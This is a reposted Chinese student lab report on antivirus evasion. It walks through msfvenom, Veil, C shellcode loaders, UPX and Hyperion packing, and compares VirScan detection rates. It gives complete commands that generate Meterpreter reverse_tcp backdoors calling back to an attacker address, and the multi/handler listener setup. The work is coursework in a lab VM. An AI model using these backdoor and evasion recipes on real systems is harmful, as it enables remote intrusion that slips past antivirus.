20234320 2025-2026-1 《网络与系统攻防技术》实验三实验报告

news/2025/10/27 11:44:33/文章来源:https://www.cnblogs.com/zizizilin/p/19168456

20232401 2025-2026-1 《网络与系统攻防技术》实验三实验报告

一、实验内容

1.1 了解恶意软件检测机制，学习免杀原理，熟悉病毒检测平台
1.2 熟悉msfvenom的使用，使用msfvenom中的编码器并尝试生成多种类型的文件
1.3 综合利用veil工具、C语言shellcode编程、加壳技术等各种免杀技术骗过杀软的检测，并在杀软开启的情况下尝试回连

二、实验环境

基于VMware的Kali虚拟机，版本如下图

win11，版本如下图

当前电脑中Windows defender已经关闭，防护软件为火绒

三、实验过程

3.1 构建免杀效果参考基准

在kali虚拟机中，使用指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.80.130 LPORT=7788 -f exe > 20234320_backdoor.exe生成后门文件，当这个程序在目标计算机上运行时，它会主动连接回攻击者，从而为攻击者提供一个远程控制通道然后传入主机。
对该后门程序进行线上检测，检测网站选取为Virscan，过程和结果如下图

检测结果为23/48，即用48个杀毒引擎检测中有23个引擎判定该文件包含恶意软件。以此为基准，对比后续采用技术的免杀效果

3.2 通过msfvenom使用编码器生成后门文件

3.2.1 生成exe后门文件并编码

使用命令msfvenom -l encoders查看msfvenom所支持的编码格式，如图：
使用适用于windows的编码格式x86/shikata_ga_nai，输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=172.16.80.130 LPORT=7788 -f exe > 20234320_backdoor_escape.exe生成后门程序并进行检测，其中“-e x86/shikata_ga_nai”制定编码方式为多态编码，"shikata_ga_nai"指定多态编码方式，“-b '\x00'”表示排除空字节（\x00）
Msfvenom使用编码器单次编码形成后门文件检出率为14/48，与基准值类似，说明单次编码的免杀效果较差
再利用指令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i -10 -b '\x00' LHOST=172.16.80.130 LPORT=7788 -f exe > 20234320_backdoor_escape_10.exe在之前的基础上进行了10次编码。“-i 10”表示对payload进行10次编码，每次迭代都会重新编码，增加复杂性和免杀效果,检测结果如下图所示
Msfvenom使用编码器进行10次编码形成后门文件检出率为14/48，与基准值类似，说明多次编码的免杀效果同样较差

3.2.2 生成jar后门文件并编码

使用命令msfvenom -p java/meterpreter/reverse_tcp LHOST=172.16.80.130 LPORT=7788 -f jar>20234320_backdoor.jar生成一个jar格式的后门，检测结果如下：
再使用命令msfvenom -p java/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=172.16.80.130 LPORT=7788 x>20234320_backdoor_escape_10.jar生成一个经过10次编码的jar后门文件，检测结果如下
Msfvenom直接生成和使用编码器进行10次编码形成后门文件检出率均为14/48，与基准值类似，说明利用Java平台和JVM的间接调用及shikata_ga_nai编码叠加jar包的免杀效果并不明显

3.2.3 生成php文件及编码后的php文件

使用指令msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.80.130 LPORT=7788 x> 20234320_backdoor.php，将上述恶意文件生成为PHP代码的形式，检测结果如下：

Msfvenom使用编码器形成的PHP代码检出率为6/48，免杀效果较基准显著提高。这是因为PHP是脚本语言，本质上是纯文本。攻击者可以极其轻松地对代码进行混淆、编码、压缩和字符串操作，并且Web服务器上存在大量复杂、高度混淆的合法代码，杀毒软件很难为所有可能的、无害的代码混淆方式建立白名单，因此为了避免误报，它们对脚本文件的检测策略通常更为保守。
但是需要触发php中的后门需要利用网站漏洞植入，较其他方式更为复杂。
利用指令msfvenom -p php/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=172.16.80.130 LPORT=7788 x> 20234320_backdoor_escape_10.php生成一份经shikata_ga_nai编码10次的php文件。

Msfvenom使用编码器多次shikata_ga_nai编码形成PHP代码检出率为2/48，免杀效果不仅较基准显著提高，较未编码前也大大提高，分析存在以下原因：

exe文件即使多层编码，最终还是要生成可执行的机器码，杀毒软件可以在运行时监控内存中的解码过程，行为分析可以检测到多层解码的"解壳"行为，且PE文件头等结构特征仍然存在。而对于PHP文件，编码后仍然是文本脚本，不涉及底层系统调用，杀毒软件通常只能进行静态分析，没有运行时行为可供监控；
shikata_ga_nai是专为x86汇编指令设计的编码器，它无法对PHP这种脚本语言代码进行编码，只能将payload降级为Windows原生可执行文件格式，因此在静态扫描时它看起来是一个被破坏的、无意义的二进制文件，很难被识别。

3.3 使用veil免杀工具

3.3.1 环境准备

通过命令sudo apt update更新软件包列表索引，再通过命令sudo apt -y install veil，下载veil工具。
原本我使用的是中科大和阿里的源，奇慢无比，后来换成了清华源，快的飞起，这次清华有赢了，kali换源可参考kali镜像站使用帮助
再使用指令usr/share/veil/config/setup.sh --force --silent,用veil自带的shell脚本配置好环境

3.3.2 使用veil生成可执行文件

输入veil进入veil框架的交互式命令行界面。输入use 1进入Evasion躲避模块
输入list查看所有可用的载荷种类
看到c/meterpreter/rev_tcp.py是第7个选项，输入use 7。这是使用Veil-Evasion工具，选择其c语言载荷模板，来生成一个具有免杀功能的、使用C语言编写的、能够建立反向TCP连接的Meterpreter载荷。如下图
输入配置信息，包括攻击机器的IP与端口，以及所需要生成文件的文件名配置，具体如下：
根据提示的路径，在/var/lib/veil/output/compiled目录下找到生成的可执行文件

3.3.3 检测veil生成可执行文件的免杀情况

基于Veil-Evasion生成的exe文件检出率为11/48，其免杀效果较基准大大提高。分析原因如下：
Veil-Evasion不是对已有的恶意软件二进制文件进行加壳或混淆（这种方式生成的“壳”本身可能已有特征），而是提供免杀的“源代码”。用户在攻击机器上实时编译这些源代码，生成一个独一无二的可执行文件。由于每次编译的编译器版本、编译时间、内存地址对齐等都不同，生成的二进制文件在字节层面几乎是唯一的，从而完美避开了基于哈希（如 MD5, SHA256）或固定字节序列的特征码。同时它通过自定义的加载器，在内存中模拟 Windows 系统的加载过程，自行完成重定位、解析导入地址表等操作，最终直接跳转到 DLL 的入口点执行，整个过程完全不接触磁盘，极大规避了文件扫描。

3.4 C语言调用Shellcode

3.4.1 使用C语言调用Shellcode制作后门程序

使用msfvenom的参数-f c可以得到C语言格式下的一个shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.80.130 LPORT=7788 -f c

将这段shellcode写入C语言程序当中，并加上主函数
通过命令i686-w64-mingw32-g++ 20234320_c_backdoor.c -o 20234320_c_backdoor.exe，将C文件编译为可执行文件

3.4.2 检测C语言调用Shellcode免杀情况

使用C语言编写的Shellcode检出率为8/48，其免杀效果较基准显著提高。

3.5 使用加壳工具

3.5.1 使用压缩壳UPX

使用命令upx 20234320_c_backdoor.exe -o 20234320_c_backdoor_upx.exe为植入Shellcode后门的程序加一个UPX压缩壳
添加了UPX压缩壳后门程序的检出率为7/48，检出率与加壳之前相似，说明这个壳的特征已经被很广泛的记录。

3.5.2 使用加密壳Hyperion

通过命令sudo cp 20234320_c_backdoor.exe /usr/share/windows-resources/hyperion/，将待加密的恶意文件shellcode_c_20232409.exe复制到Hyperion工具所在的工作目录中。
通过命令cd /usr/share/windows-resources/hyperion，将当前的工作目录切换到Hyperion所在的文件夹。
通过命令wine hyperion.exe -v 20234320_c_backdoor.exe 20234320_c_backdoor.exe_hyp.exe，通过wine在Linux上运行Windows程序hyperion.exe，使用详细模式-v对20234320_c_backdoor.exe文件进行加密，如下图所示：

经过Hyperion加密后的后门程序检出率大幅上升，因为Hyperion是一类公开的加密壳工具，这个壳的特征已经被很广泛的记录，故很容易被检出。

3.6 组合使用msfvenom工具与加壳技术

3.6.1 使用msfvenom工具生成可执行程序

通过命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=172.16.80.130 LPORT=7788 -f c > 20234320_shellcode.c生成一个经过10次shikata_ga_nai编码的Meterpreter反向TCP载荷
通过vim编辑器，向生成的文件中加入main函数
通过命令i686-w64-mingw32-g++ 20234320_shellcode.c -o 20234320_shellcode_multi.exe，将原文件编译为可执行文件

3.6.2 使用压缩壳加密

通过命令upx 20234320_shellcode_multi.exe -o 20234320_shellcode_multi_upx.exe，为程序加上UPX压缩壳

3.6.3 使用加密壳加密

通过命令wine hyperion.exe -v 20234320_shellcode_multi.exe 20234320_shellcode_multi_hyperion.exe，为可执行文件加上Hyperion加密壳

3.6.4 免杀效果检测

添加了UPX压缩壳的shellcode后门程序的检出率为3/48，免杀效果较基准显著提高

添加了hyperion加密壳的shellcode后门程序的检出率为22/48，检出率较基准显著提高，说明加密壳技术已经被杀毒厂商大规模记录，不应该使用该技术进行免杀

经过压缩壳和加密壳加密的后门程序均在传入到主机的第一时间被火绒杀毒软件检测到并进行隔离

3.6.5 开启杀软回连实测

在kali中输入msfconsole打开msf的控制台，输入以下命令，开启监听

点击查看代码

use exploit/multi/handler（使用Metasploit的多功能监听器模块）
set payload windows/meterpreter/reverse_tcp（设置载荷类型）
set LHOST 172.16.80.130（攻击者ip地址，即虚机ip地址）
set LPORT 7788（监听的端口）
exploit（启动监听服务）

![image](https://img2024.cnblogs.com/blog/3444603/202510/3444603-20251027094250004-1959389025.png)

将检出率为2/48的恶意文件20234320_shellcode_multi_upx.exe从隔离区取出，尝试回连

程序在从隔离区取出执行时，再次被检测到执行了危险行为，进程被直接关闭，程序再次进入隔离区

四、问题解决

问题一：下载veil时速度极慢，且kali已完成换源，采用了阿里源、中科大源和浙大源

解决一：测试其他源，目前在常用镜像源中，下载速度最快的是清华的镜像源，可参考kali镜像站使用帮助进行换源操作

点击查看代码

deb https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main non-free contrib non-free-firmware
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main non-free contrib non-free-firmware

五、回答问题

杀软是如何检测出恶意代码的？
杀毒软件的检测机制可以分为两大类：静态分析和动态分析。
静态分析是指在恶意代码没有实际运行的情况下，通过分析其静态特征来判断其是否为恶意软件，包括特征码检测、启发式分析、云查杀等。
动态分析是指让程序在一个受控的、隔离的环境（如沙箱）中实际运行，然后观察其行为具有危害性，从而判断其是否为恶意软件。包括行为监控、沙箱技术等等。
免杀是做什么？
免杀是指通过一系列技术手段，使恶意软件（如病毒、木马等）能够绕过杀毒软件的检测和查杀的技术。其核心目标是通过修改恶意软件的特征码、行为或运行方式，使其不被杀毒软件识别和拦截。
免杀的基本方法有哪些？
修改特征码：通过修改程序的特征码，使其与杀毒软件的特征库不匹配，从而避免被检测。常见的修改方法包括直接修改十六进制、修改字符串大小写、等价替换、指令顺序调换、通用跳转等。
加壳与改壳：通过加壳或改壳技术，对程序进行加密或打包，使其在运行时解密执行，从而隐藏特征码。
花指令免杀：通过添加无意义的指令来混淆反汇编结果，干扰杀毒软件的检测。
内存免杀：通过修改内存中的特征码或行为，绕过杀毒软件的内存扫描。
行为免杀：通过改变程序的行为，如使用反弹连接、隧道技术、加密通讯数据等，避免被行为检测。
分离免杀：将ShellCode与加载器分离，通过分段加载或远程加载等方式，避免被检测。

六、心得体会

本次免杀技术实验，我掌握了msfvenom、veil、加壳工具等多种恶意代码免杀工具的使用，熟悉了对后门程序评估其免杀效果的方式与流程，更深入理解了杀软检测机制与免杀技术的对抗逻辑，收获颇丰。
实验中，以msfvenom直接生成的exe后门为基准，我发现单一编码器如无论单次还是10次编码，对exe、jar文件的免杀效果都十分有限，因为即便多次编码，PE文件结构、最终解码后的机器码仍会暴露痕迹。而实验过程中，只有php脚本没有被火绒检出，其他文件都无一幸免，说明php脚本文件的免杀效果显著，是成为静态免杀的优选方向，但后续我也需要对网站漏洞植入和php执行等技术进行更深入的学习，这样才能完成完整的渗透流程。
加壳实验的结果让我认识到，选择合适的免杀策略能起到更好的效果，并且免杀策略的选择一定要与时俱进。实验中UPX压缩壳仅将检出率从8/48降至7/48，Hyperion加密壳反而因公开特征被广泛记录导致检出率飙升，杀软对“已知壳”的特征库更新速度远快于工具迭代，我们进行免杀的过程中一定要选择合适且较新的一些免杀技术。
后续“msfvenom编码+C编译shellcode+UPX”的组合技术将静态检出率压至3/48，展现了其强大的静态免杀能力。但执行时仍被火绒的行为检测拦截，也让我意识到单纯追求低静态检出率不足以实现完整免杀，对程序行为的隐藏也是免杀的重点。
最后的最后，一定要有安全和防范意识，现在的杀软很强，但是如果我们为了图方便关掉它的功能，又不注意各种软件的来源，对杀软或者系统的警示不注意，就很容易被坏蛋潜入你的电脑。

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/947447.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！